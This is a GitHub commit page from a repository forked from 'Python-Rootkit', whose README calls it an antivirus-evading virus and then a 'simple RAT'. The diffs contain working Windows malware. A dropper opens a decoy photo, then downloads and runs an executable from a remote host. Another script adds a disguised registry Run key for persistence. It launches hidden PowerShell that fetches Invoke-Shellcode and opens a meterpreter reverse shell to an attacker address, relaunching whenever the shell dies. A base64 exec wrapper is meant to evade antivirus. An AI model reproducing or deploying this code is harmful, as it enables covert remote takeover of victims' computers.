forked from 0xIslamTaha/Python-Rootkit
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
islamTaha
committed
Jun 28, 2016
1 parent
f9a5c79
commit 83d7433
Showing
10 changed files
with
181 additions
and
124 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
##The goal of this repo is developing a virus which has ability to bypass AV | ||
##The goal of this repo is developing a simple RAT |
This file was deleted.
Oops, something went wrong.
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,20 +1,20 @@ | ||
import base64 | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
source = '' | ||
with open('source.py','r') as file: | ||
for line in file: | ||
#byPass imprt commands | ||
if "import" in line: | ||
pass | ||
else: | ||
source += line | ||
encode = base64.b64encode(source) | ||
import base64 | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
source = '' | ||
with open('source.py','r') as file: | ||
for line in file: | ||
#byPass imprt commands | ||
if "import" in line: | ||
pass | ||
else: | ||
source += line | ||
encode = base64.b64encode(source) | ||
exec (base64.b64decode(encode)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,10 +1,10 @@ | ||
from distutils.core import setup | ||
import py2exe, sys, os | ||
|
||
sys.argv.append('py2exe') | ||
|
||
setup( | ||
options = {'py2exe': {'bundle_files': 1, 'compressed': True}}, | ||
windows = [{'script': "try.py","icon_resources": [(0, "icon.ico")]}], | ||
zipfile = None, | ||
from distutils.core import setup | ||
import py2exe, sys, os | ||
|
||
sys.argv.append('py2exe') | ||
|
||
setup( | ||
options = {'py2exe': {'bundle_files': 1, 'compressed': True}}, | ||
windows = [{'script': "source.py","icon_resources": [(0, "icon.ico")]}], | ||
zipfile = None, | ||
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
import requests | ||
import os | ||
import time | ||
import tempfile | ||
import subprocess | ||
|
||
#open photos | ||
os.startfile('test.jpg') | ||
time.sleep(1) | ||
os.startfile('test.jpg') | ||
|
||
|
||
# download virRu5 | ||
url = "http://ec2-52-90-251-67.compute-1.amazonaws.com/GoogleChromeAutoLaunch.exe" | ||
while True: | ||
try: | ||
response = requests.get(url, stream=True) | ||
except: | ||
pass | ||
else: | ||
break | ||
|
||
# move to temp | ||
tempDirectory = tempfile.gettempdir() | ||
newFile = tempDirectory + "//GoogleChromeAutoLaunch.exe" | ||
|
||
with open(newFile, "wb") as handle: | ||
handle.write(response.content) | ||
|
||
# execute virRu5 | ||
subprocess.Popen(newFile) | ||
|
||
''' | ||
import shutil | ||
# copy file to temp | ||
tempDirectory = tempfile.gettempdir() | ||
shutil.copy('test.jpg',tempDirectory) | ||
''' |
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
import base64 | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
source = '' | ||
with open('source.py','r') as file: | ||
for line in file: | ||
#byPass imprt commands | ||
if "import" in line: | ||
pass | ||
else: | ||
source += line | ||
encode = base64.b64encode(source) | ||
exec (base64.b64decode(encode)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
from distutils.core import setup | ||
import py2exe, sys, os | ||
|
||
sys.argv.append('py2exe') | ||
|
||
setup( | ||
options = {'py2exe': {'bundle_files': 1, 'compressed': True}}, | ||
windows = [{'script': "source.py","icon_resources": [(0, "icon.ico")]}], | ||
zipfile = None, | ||
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,85 +1,85 @@ | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
NO_IP_HOST = 'googlechromeauto.serveirc.com' | ||
LHOST = '192.168.1.3'#'googlechromeauto.serveirc.com' #"54.175.188.182" | ||
LPORT = 443 | ||
TIME_SLEEP = 10 | ||
|
||
TEMP_PATH = tempfile.gettempdir() | ||
REG_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run" | ||
REG_NAME = "GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312" | ||
REG_VALUE = '"' + TEMP_PATH + '\GoogleChromeAutoLaunch.exe' + '"' + ' --no-startup-window /prefetch:5' | ||
|
||
def set_reg_key_value(REG_PATH, name, value): | ||
try: | ||
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0,_winreg.KEY_ALL_ACCESS) | ||
_winreg.SetValueEx(registry_key, name, 0, _winreg.REG_SZ, value) | ||
except WindowsError: | ||
pass | ||
|
||
def fire(): | ||
if NO_IP_HOST: | ||
# Check if no-ip is online or not | ||
check_no_ip_online() | ||
|
||
if platform.machine().endswith('32'): | ||
try: | ||
subprocess.Popen("powershell -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True) | ||
except WindowsError: | ||
pass | ||
else: | ||
try: | ||
subprocess.Popen("C:\Windows\System32\WindowsPowerShell\/v1.0\powershell.exe -noprofile -windowstyle hidden -noninteractive -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True) | ||
except WindowsError: | ||
pass | ||
|
||
def run_after_close(): | ||
foundIT = False | ||
runningProcess = [] | ||
for item in os.popen('tasklist').read().splitlines()[4:]: | ||
runningProcess.append(item.split()) | ||
for item2 in runningProcess: | ||
if "powershell.exe" in item2: | ||
foundIT = True | ||
|
||
if not foundIT: | ||
fire() | ||
|
||
|
||
def get_noip_ip_address(): | ||
global NO_IP_HOST | ||
global LHOST | ||
LHOST = socket.gethostbyname(NO_IP_HOST) | ||
|
||
|
||
def check_no_ip_online(): | ||
# Check if NoIP is online, If else dont fire | ||
NO_IP_HTTP = "http://" + NO_IP_HOST | ||
while True: | ||
try: | ||
urllib.urlopen(NO_IP_HTTP).getcode() | ||
except: | ||
time.sleep(10) | ||
else: | ||
get_noip_ip_address() | ||
break | ||
|
||
|
||
# set the reg value in run key | ||
set_reg_key_value(REG_PATH,REG_NAME,REG_VALUE) | ||
|
||
# fire the payload | ||
fire() | ||
time.sleep(5) | ||
|
||
# keep firing in case of the connection is loss | ||
while True: | ||
run_after_close() | ||
import subprocess | ||
import tempfile | ||
import _winreg | ||
import platform | ||
import time | ||
import os | ||
import socket | ||
import urllib | ||
|
||
NO_IP_HOST = 'googlechromeauto.serveirc.com' | ||
LHOST = '192.168.1.3'#'googlechromeauto.serveirc.com' #"54.175.188.182" | ||
LPORT = 443 | ||
TIME_SLEEP = 10 | ||
|
||
TEMP_PATH = tempfile.gettempdir() | ||
REG_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run" | ||
REG_NAME = "GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312" | ||
REG_VALUE = '"' + TEMP_PATH + '\GoogleChromeAutoLaunch.exe' + '"' + ' --no-startup-window /prefetch:5' | ||
|
||
def set_reg_key_value(REG_PATH, name, value): | ||
try: | ||
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0,_winreg.KEY_ALL_ACCESS) | ||
_winreg.SetValueEx(registry_key, name, 0, _winreg.REG_SZ, value) | ||
except WindowsError: | ||
pass | ||
|
||
def fire(): | ||
if NO_IP_HOST: | ||
# Check if no-ip is online or not | ||
check_no_ip_online() | ||
|
||
if platform.machine().endswith('32'): | ||
try: | ||
subprocess.Popen("powershell -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True) | ||
except WindowsError: | ||
pass | ||
else: | ||
try: | ||
subprocess.Popen("C:\Windows\System32\WindowsPowerShell\/v1.0\powershell.exe -noprofile -windowstyle hidden -noninteractive -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True) | ||
except WindowsError: | ||
pass | ||
|
||
def run_after_close(): | ||
foundIT = False | ||
runningProcess = [] | ||
for item in os.popen('tasklist').read().splitlines()[4:]: | ||
runningProcess.append(item.split()) | ||
for item2 in runningProcess: | ||
if "powershell.exe" in item2: | ||
foundIT = True | ||
|
||
if not foundIT: | ||
fire() | ||
|
||
|
||
def get_noip_ip_address(): | ||
global NO_IP_HOST | ||
global LHOST | ||
LHOST = socket.gethostbyname(NO_IP_HOST) | ||
|
||
|
||
def check_no_ip_online(): | ||
# Check if NoIP is online, If else dont fire | ||
NO_IP_HTTP = "http://" + NO_IP_HOST | ||
while True: | ||
try: | ||
urllib.urlopen(NO_IP_HTTP).getcode() | ||
except: | ||
time.sleep(10) | ||
else: | ||
get_noip_ip_address() | ||
break | ||
|
||
|
||
# set the reg value in run key | ||
set_reg_key_value(REG_PATH,REG_NAME,REG_VALUE) | ||
|
||
# fire the payload | ||
fire() | ||
time.sleep(5) | ||
|
||
# keep firing in case of the connection is loss | ||
while True: | ||
run_after_close() | ||
time.sleep(TIME_SLEEP) |